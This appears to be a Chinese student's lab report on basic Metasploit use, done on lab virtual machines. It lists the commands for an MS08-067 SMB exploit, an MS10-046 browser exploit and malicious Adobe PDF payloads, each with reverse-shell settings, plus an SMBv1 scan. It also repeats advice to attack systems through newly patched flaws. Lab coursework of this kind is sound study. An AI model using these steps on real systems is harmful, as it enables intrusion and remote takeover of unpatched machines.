基础问题回答

  • 用自己的话解释什么是exploit,payload,encode.

    • exploit 就是运行该模块吧,在msf的模块中配置好各项属性后exploit一下就开始运行使用该模块了
    • payload 是攻击载荷的统称,我们需要配置攻击载荷来选择获取靶机shell的方式
    • encode 编码,是一种免杀的方式

实践过程记录

1、一个主动攻击实践

  • 打开终端输入msfconsole,在msf命令行中输入search MS08-067搜索漏洞模块

  • 输入use exploit/windows/smb/ms08_067_netapi使用该模块,这是一个针对Windows平台下smb服务ms08_067漏洞的渗透攻击

  • 输入set payload generic/shell_reverse_tcp选择该攻击载荷,通过反弹连接获得shell权限

  • 输入show payloads,查看需要配置的属性

  • 输入set RHOST 192.168.241.138、set LHOST 192.168.241.134、set LPORT 5230配置属性

  • 然后exploit进行监听

2、一个针对浏览器的攻击

  • 输入search ms10_046查找漏洞

  • 由于是要对浏览器进行攻击,输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

  • 输入set payload generic/shell_reverse_tcp选择该攻击载荷

  • 输入show options,查看需要配置的属性

  • 输入set SRVHOST 192.168.241.134、set LHOST 192.168.241.134、set LPORT 5230配置属性,其中SRVHOST是后门服务器,设置的是攻击者的IP

  • 输入exploit生成URL

  • 在windows端访问该URL

  • 有个小插曲,windows端访问该url后,产生的后门被qq电脑管家直接查杀了。。。

  • 输入sessions,可看到一个ID为2的连接

  • 输入session -i 2,接入ID为2的连接,获取shell权限成功。

3、一个针对客户端的攻击

  • 输入search adobe查询漏洞,我选择的是exploit/windows/fileformat/adobe_collectemailinfo

  • 输入set payload windows/meterpreter/reverse_tcp选择该攻击载荷

  • 输入set LHOST 192.168.241.134、set LPORT 5230配置属性

  • 输入exploit,可以看到生成了msf.pdf

  • 将它发送到windows xp靶机

  • 输入相关命令开始监听

  • 这里开启监听之后,在靶机运行pdf一直不能回连不知道是什么原因,猜测是回连的ip和端口写错了所以重做了两遍后门pdf!还是不能回连

  • 因为得不到任何提示,重新选择漏洞windows/fileformat/adobe_cooltype_sing

  • 将靶机上的pdf文件关闭后,监听被结束

4、成功应用任何一个辅助模块

  • 我选择的是 auxiliary/scanner/smb/smb1

  • 这个辅助模块是用于扫描目标ip是否支持smbv1协议

  • 因为只检测靶机192.168.241.139,所以THREAD就可以默认是1,不做修改

  • run一下(也可以是exploit)


离实战还缺些什么技术或步骤?

  • 找不到现行主流操作系统、浏览器、客户端的漏洞

  • 针对客户端的漏洞攻击要如何才能让目标长时间运行该客户端,以有足够时间来进行相关操作


实践总结与体会

  • 限于无法攻击更多是因为找不到存在于各个软件或操作系统的漏洞,所以当相关软件有漏洞补丁需要更新时,一定要及时更新!就像老师在课堂上说的,找不到漏洞没关系,可以去官网上看最新的漏洞补丁补的是哪个漏洞,然后针对该漏洞进行攻击,十有八九会有所收获,毕竟绝大多数人都没有及时更新补丁的习惯。

  • 也是再一次感受到了msf的局限性,里面收录的漏洞虽然已经足够多,但大多是已经过时了的系统漏洞,要将它用于实战则需要我们自己向其内部添加一些最新的漏洞模块,这显然不太现实。

  • 这门课是真的越学越想搞一波大事啊

  • 感谢5233刘高乐同学的电脑!我的vm版本过低拷过来的靶机无法兼容,加上老师也有说过这次实验可以使用其他同学的电脑,就借用刘高乐同学的电脑完成了这次实验!

2017-2018-2 20155230《网络对抗技术》实验5:MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165322 Exp5 MSF基础应用 目录 实验内容与步骤 一个主动攻击实践 MS08-067(失败) ms17_010_psexec(成功且唯一) 一个针 ...

  5. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  6. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  7. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  8. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  9. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  10. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

随机推荐

  1. Linux下安装VSCode

    进行下载 64位的包:地址: https://code.visualstudio.com/docs/?dv=linux64&build=insiders 1.解压: tar -zxvf cod ...

  2. 在sublime text 3中让.vue文件的内容变成彩色

    直接上步骤: 1.按住ctrl + shift + p 2.输入install Package 3.输入Vue Syntax Highlight 执行完以上3步,再次打开.vue文件,会发现里面的内容 ...

  3. Hadoop 客户端问题

    错误: log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info.Exception in ...

  4. 快速配置webpack 4.x

    区分开发模式和生产模式: npm run start——开发模式,启用devServer,文件的改动实时更新.刷新 npm run build——生产模式,打包文件到dist文件夹 // packag ...

  5. Expo大作战(二十五)--expo sdk api之Admob

    简要:本系列文章讲会对expo进行全面的介绍,本人从2017年6月份接触expo以来,对expo的研究断断续续,一路走来将近10个月,废话不多说,接下来你看到内容,讲全部来与官网 我猜去全部机翻+个人 ...

  6. CSS盒模型详解(图文教程)

    本文最初发表于博客园,并在GitHub上持续更新.以下是正文. 盒子模型 前言 盒子模型,英文即box model.无论是div.span.还是a都是盒子. 但是,图片.表单元素一律看作是文本,它们并 ...

  7. mysql的几个知识点

    常用命令 原则:能用可视化工具的尽量使用工具,命令行仅限于问题排查. mysql -u ACCOUNT -pPWD -h IP -P port [-D database] //连接数据库 show d ...

  8. Java 注解用法详解——@SuppressWarnings

    转自: https://www.cnblogs.com/fsjohnhuang/p/4040785.html Java魔法堂:注解用法详解——@SuppressWarnings   一.前言 编码时我 ...

  9. Python3 sqlacodegen 根据已有数据库生成 ORM 使用的 model.py

    pip install sqlacodegen pip install pymysql sqlacodegen mysql+pymysql://username:password@127.0.0.1: ...

  10. IAM页面是在统一区分配的还是在混合区分配的?

    IAM页面是在统一区分配的还是在混合区分配的? IAM页面的作用这里就不说了,网上的资料很多 文章中用到的工具:查看SQLSERVER内部数据页面的小插件Internals Viewer 先建立四张表 ...